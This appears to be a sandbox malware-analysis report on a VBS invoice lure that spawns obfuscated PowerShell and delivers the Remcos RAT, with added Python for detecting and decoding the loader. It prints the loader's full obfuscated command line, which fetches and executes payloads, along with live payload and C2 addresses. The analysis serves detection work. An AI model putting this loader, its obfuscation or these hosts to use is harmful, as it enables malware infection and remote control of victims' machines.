Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: jawapharmaceuticals.com |
Virustotal: Detection: 6% |
Source: awb_shipping_label_invoice_15_04_2024_000000000000024.vbs |
Virustotal: Detection: 8% |
Source: |
Binary string: ws\System.Core.pdb7 source: powershell.exe, 0000000C.00000002.2614089673.00000000075D1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tem.Core.pdb source: powershell.exe, 0000000C.00000002.2614089673.00000000075D1000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
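The parent/child pair just above (wscript.exe starting powershell.exe), the 3966-byte command line reported further down this page, and the string-building tricks visible in that command line (`$Synsopfattelsen+='g'`, `$Vaults.$Synsopfattelsen.Invoke(`, `. ($Opisometer)`) are the signals a process-creation detection would key on. The Python below is an added example, not part of the sandbox report or of any vendor's rule set: it scores Sysmon-style process-start records on those three signals. The event list, the PIDs, the benign third event and the 512-byte length threshold are constructed or assumed for the example; the loader's command line is embedded only up to its first decoded-string assignments.

```python
"""Added example: triage process-start events for script-host -> PowerShell chains."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:            # the fields a Sysmon EID 1 / EDR process-start record carries
    pid: int
    parent_image: str
    image: str
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Obfuscation tells copied from the report's command line (assumed to generalise):
OBFUSCATION_TELLS = {
    "method-name-via-variable": re.compile(r"\.\$\w+\.Invoke\("),   # $s.$name.Invoke(
    "dot-source-variable": re.compile(r"\.\s*\(\$\w+\)"),            # . ($var) (...)
    "string-piece-concat": re.compile(r"\$\w+\+=\s*'[^']*'"),        # $var+='g'
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(ev, long_cmdline=512):
    """Return the reasons an event is suspicious (empty list = nothing to report).
    long_cmdline is an assumed threshold; the loader here was reported at 3966 bytes."""
    reasons = []
    if basename(ev.parent_image) in SCRIPT_HOSTS and basename(ev.image) in SHELLS:
        reasons.append("script-host-spawned-shell")
    if len(ev.cmdline) >= long_cmdline:
        reasons.append("long-cmdline:%d" % len(ev.cmdline))
    hits = [n for n, rx in OBFUSCATION_TELLS.items() if rx.search(ev.cmdline)]
    if len(hits) >= 2:          # a single tell is common in legitimate scripts
        reasons.append("obfuscated-powershell:" + ",".join(hits))
    return reasons


def triage(events, **kw):
    """Map pid -> reasons for every event that raised at least one reason."""
    findings = {}
    for ev in events:
        reasons = assess(ev, **kw)
        if reasons:
            findings[ev.pid] = reasons
    return findings


# Constructed events. LOADER_CMDLINE is the opening part of the command line in the
# report (truncated here); the PIDs and the benign third event are made up.
LOADER_CMDLINE = (
    r"$Krispin = 1;$Synsopfattelsen='Substrin';$Synsopfattelsen+='g';"
    r"Function Macrometeorology($Vaults){$Subquestions=$Vaults.Length-$Krispin;"
    r"For($Staaltraadsnettet=2; $Staaltraadsnettet -lt $Subquestions; $Staaltraadsnettet+=(3))"
    r"{$Designless+=$Vaults.$Synsopfattelsen.Invoke($Staaltraadsnettet, $Krispin);}$Designless;}"
    r"function Loggen($Darknesses){. ($Opisometer) ($Darknesses);}"
    r"$Sniffles=Macrometeorology '.aMKooOvz.fiMilUnlbea v/.k5 M.Ps0B, De(.oWB.isanAtd KoGrwTrsTy "
    r"CoNToT o Tr1Cu0Ta.,n0Fo; rW,ai LnBa6 D4 ,;Sh TexWo6 B4 ,;M, SurRuvPe:Vo1Se2Fi1 R.,u0No),e "
    r",nGFeeKacRuk PoT / E2Ig0Ps1Ul0Fo0.m1R 0St1Op OF Hi OrZoeInf.noSex ,/Ab1.t2sa1Sp.,r0Pe ';"
    r"$Rabiateste=Macrometeorology ' SUPhsSte Nr ,- nASvgN,emenA.tT. ';"
    r"$awiggle=Macrometeorology ' nhL.tUat ,pKr:Re/Ki/ f9Ch4L,.F 1 5Mo6Ba.S,7S,9Ba.Wi6Un4un/EnsR "
    r"tT.rSky Kg ,eS,tVejCos .KvtH,hAfn.i>Veh et FtUnp F:.e/Fa/Ko1b,9ba3Pu. 2Ri2Du2D .Ch9Hi6 L.O,"
    r"1To4Ca9,e/L sHitMar.pyBrg CePrtAfj,asSo.TrtInh rnPr ';"
    r"$Pteridophilism=Macrometeorology ' .>Mo ';$Opisometer=Macrometeorology 'aniL e .x.m ';"
)
SAMPLE_EVENTS = [
    ProcEvent(101, r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", LOADER_CMDLINE),
    ProcEvent(102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", LOADER_CMDLINE),
    ProcEvent(103, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The second constructed event mirrors the report's own tree, where the first powershell.exe spawns a second one with the same 3966-byte command line: it still trips the length and obfuscation checks even though its parent is not a script host, so the three signals are scored independently rather than as one chained condition.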
Source: Traffic |
Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.9:49712 -> 193.222.96.11:57484 |
Source: Traffic |
Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.11:57484 -> 192.168.2.9:49712 |
Source: unknown |
DNS query: name: iwarsut775laudrye2.duckdns.org |
Source: global traffic |
HTTP traffic detected: GET /strygetjs.thn HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 94.156.79.64 Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /ZtoOstiFBXtBvORCuTFplvl84.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 94.156.79.64 Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
DNS traffic detected: queries for: iwarsut775laudrye2.duckdns.org |
Source: powershell.exe, 00000008.00000002.2591690072.000001F70176B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591690072.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://193.222.96.149/strygetjs.thn |
Source: powershell.exe, 00000008.00000002.2591690072.000001F701BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591690072.000001F700225000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://94.156.79.64 |
Source: powershell.exe, 00000008.00000002.2591690072.000001F70176B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591690072.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://94.156.79.64/strygetjs.thn |
Source: powershell.exe, 0000000C.00000002.2591487790.0000000003230000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: wscript.exe, 00000000.00000003.1302607608.0000024F707CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1302607608.0000024F707CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/D |
Source: wscript.exe, 00000000.00000003.1303244235.0000024F70F20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1302964975.0000024F70EF8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9b997501ca97f |
Source: wscript.exe, 00000000.00000003.1303109894.0000024F70ED4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1303027605.0000024F70EAC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9b997501ca |
Source: powershell.exe, 00000008.00000002.2636244693.000001F710069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2614089673.00000000075A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.2591690072.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2592757321.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2614089673.00000000075A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000008.00000002.2591690072.000001F700001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2614089673.00000000075A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.2591690072.000001F7011A6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.2636244693.000001F710069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: amsi32_1792.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 968, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1792, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: awb_shipping_label_invoice_15_04_2024_000000000000024.vbs |
Static file information: Suspicious name |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 3966 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 3966 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 3966 |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Krispin = 1;$Synsopfattelsen='Substrin';$Synsopfattelsen+='g';Function Macrometeorology($Vaults){$Subquestions=$Vaults.Length-$Krispin;For($Staaltraadsnettet=2; $Staaltraadsnettet -lt $Subquestions; $Staaltraadsnettet+=(3)){$Designless+=$Vaults.$Synsopfattelsen.Invoke($Staaltraadsnettet, $Krispin);}$Designless;}function Loggen($Darknesses){. ($Opisometer) ($Darknesses);}$Sniffles=Macrometeorology '.aMKooOvz.fiMilUnlbea v/.k5 M.Ps0B, De(.oWB.isanAtd KoGrwTrsTy CoNToT o Tr1Cu0Ta.,n0Fo; rW,ai LnBa6 D4 ,;Sh TexWo6 B4 ,;M, SurRuvPe:Vo1Se2Fi1 R.,u0No),e ,nGFeeKacRuk PoT / E2Ig0Ps1Ul0Fo0.m1R 0St1Op OF Hi OrZoeInf.noSex ,/Ab1.t2sa1Sp.,r0Pe ';$Rabiateste=Macrometeorology ' SUPhsSte Nr ,- nASvgN,emenA.tT. ';$awiggle=Macrometeorology ' nhL.tUat ,pKr:Re/Ki/ f9Ch4L,.F 1 5Mo6Ba.S,7S,9Ba.Wi6Un4un/EnsR tT.rSky Kg ,eS,tVejCos .KvtH,hAfn.i>Veh et FtUnp F:.e/Fa/Ko1b,9ba3Pu. 2Ri2Du2D .Ch9Hi6 L.O,1To4Ca9,e/L sHitMar.pyBrg CePrtAfj,asSo.TrtInh rnPr ';$Pteridophilism=Macrometeorology ' .>Mo ';$Opisometer=Macrometeorology 'aniL e .x.m ';$Fatningen = Macrometeorology 'IneT.c.hhVaoGe In%enaSppSkp.adSyaTatPraRe%Jo\unJRau Vn Gk GiH e RnMasC.. SPKar .oMo P.&Z &He Ope.ocInhPao l ,a$Se ';Loggen (Macrometeorology 'Bi$ GgO,lMao,ab ,aKul.e: dHIny BlBsa BsTimSlu ,sB =Re(Rec Um DdDo C./ acBr .$seFdvaPrtPunRoiPanStgcee LnH ) M ');Loggen (Macrometeorology 'An$ GgsklA,oAnb oa DlAm:Reb aPrcSmkUnf IiQulTals eRerEl=Ro$InaTawOri ,g CgMilReeDr.BlsdopN lDoiAptA,(Ca$AfPH,tDreKarI.iSpdProdvp ,hBei.plthiInsTrmF.) 
K ');$awiggle=$backfiller[0];Loggen (Macrometeorology 'S,$GagT,l SoDeb Fa.ul B: SKDuoStmYup seBon,asT,e BrS.eGlsFi=O N teElw F-A.O eb,aj.aeLacArtl cS ,yS,sF tSyeO mse.SqNGle,rtIn.EnW UeAnb .CSil iBrenon TtJu ');Loggen (Macrometeorology 'Ta$ UKT.o nmEipG.eInnDrsStePer,re .sF..MuHSye,ua PdD,eFerKrsLa[Ra$ NRAdaSqb Pibda ,tTreAtsHdtCre s]C.=Sa$ rSVenS iUdfR.fKvlFre HsSv ');$Kautionistens=Macrometeorology 'TeKFao FmBepFeefenKlsMieAsr Ces,si,.LeD oInwStnCel.eoMaabidH,F TiSylAneRe( F$ aWow,iiT.g rg,mlFoeRe,Fo$MeC.vr LoAcf .tPae.prC.iNosLue K) a ';$Kautionistens=$Hylasmus[1]+$Kautionistens;$Crofterise=$Hylasmus[0];Loggen (Macrometeorology ' S$RegK,lVeoEgb.uaHelT :EfsSwiRedDieB n.duD,mVim FeidrP,eA.tTesHa=S,(AlTTae,osRat .-.tPDea etSlh v Re$ .CStrBao PfAitAfeForChiIns.ie,a) ');while (!$sidenummerets) {Loggen (Ma |
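The command line above defines the loader's whole string-hiding scheme: `Macrometeorology` walks its argument from index 2 in steps of 3 (`For($i=2; $i -lt $Vaults.Length-1; $i+=3)`) and keeps one character per step with `Substring`, whose name is itself assembled as `'Substrin'+'g'` to dodge keyword matching; `Loggen` then dot-sources the decoded text through `$Opisometer`, which decodes to `iex`. The Python below is an added example, not part of the sandbox report or of the malware: it recovers the decoder's name, start index, stride and trim from the script text and decodes every literal passed to it. The embedded `SAMPLE` is constructed from the function definition and three short literals on this page; the longer literals are deliberately left out because repeated spaces inside them were collapsed when the report was rendered, which shifts the 3-character stride.

```python
"""Added example: decode the every-third-character string hiding used by this loader."""
import re

# Constructed sample: the decoder definition plus three short encoded literals copied
# from the wscript.exe -> powershell.exe command line in the report.
SAMPLE = (
    r"$Krispin = 1;$Synsopfattelsen='Substrin';$Synsopfattelsen+='g';"
    r"Function Macrometeorology($Vaults){$Subquestions=$Vaults.Length-$Krispin;"
    r"For($Staaltraadsnettet=2; $Staaltraadsnettet -lt $Subquestions; $Staaltraadsnettet+=(3))"
    r"{$Designless+=$Vaults.$Synsopfattelsen.Invoke($Staaltraadsnettet, $Krispin);}$Designless;}"
    r"function Loggen($Darknesses){. ($Opisometer) ($Darknesses);}"
    r"$Rabiateste=Macrometeorology ' SUPhsSte Nr ,- nASvgN,emenA.tT. ';"
    r"$Pteridophilism=Macrometeorology ' .>Mo ';"
    r"$Opisometer=Macrometeorology 'aniL e .x.m ';"
)

# Skeleton of the decoder: Function NAME($s){$n=$s.Length-$TRIM;For($i=START; $i -lt $n; $i+=(STEP))
DECODER_RE = re.compile(
    r"Function\s+(?P<fn>\w+)\(\$\w+\)\{\$\w+=\$\w+\.Length-\$(?P<trim>\w+);"
    r"For\(\$\w+=(?P<start>\d+);\s*\$\w+\s+-lt\s+\$\w+;\s*\$\w+\+=\(?(?P<step>\d+)\)?\)",
    re.IGNORECASE,
)


def find_decoder(script):
    """Return (function name, start index, step, trim) or raise if the pattern is absent."""
    m = DECODER_RE.search(script)
    if m is None:
        raise ValueError("no every-Nth-character decoder found")
    # The trim is held in a variable ($Krispin = 1 here); fall back to 0 if it is not assigned.
    trim_m = re.search(r"\$" + re.escape(m["trim"]) + r"\s*=\s*(\d+)", script)
    trim = int(trim_m.group(1)) if trim_m else 0
    return m["fn"], int(m["start"]), int(m["step"]), trim


def decode(blob, start=2, step=3, trim=1):
    """Equivalent of Macrometeorology(): Substring(i, 1) for i = start, start+step, ...
    while i < len(blob) - trim."""
    return "".join(blob[i] for i in range(start, len(blob) - trim, step))


def decode_literals(script):
    """Decode every single-quoted literal passed to the decoder.
    Returns [(assigned variable name or None, plaintext)] in script order; unnamed
    entries are the arguments handed straight to Loggen (i.e. to iex)."""
    fn, start, step, trim = find_decoder(script)
    lit_re = re.compile(r"(?:\$(\w+)\s*=\s*)?" + re.escape(fn) + r"\s+'([^']*)'")
    return [(name or None, decode(raw, start, step, trim))
            for name, raw in lit_re.findall(script)]


if __name__ == "__main__":
    for name, text in decode_literals(SAMPLE):
        print(f"{name or '<inline>'}: {text!r}")
```

Run it over the full command line taken from the sandbox or EDR record, not from this page's rendering. Decoding `$awiggle` and splitting it on the decoded `$Pteridophilism` (`>`) is what yields the two download URLs the report lists as strings found in powershell.exe memory, http://94.156.79.64/strygetjs.thn and http://193.222.96.149/strygetjs.thn; note that 193.222.96.149 is the payload host, while the Remcos check-in in the Snort alerts goes to 193.222.96.11:57484, so both addresses belong in the indicator set.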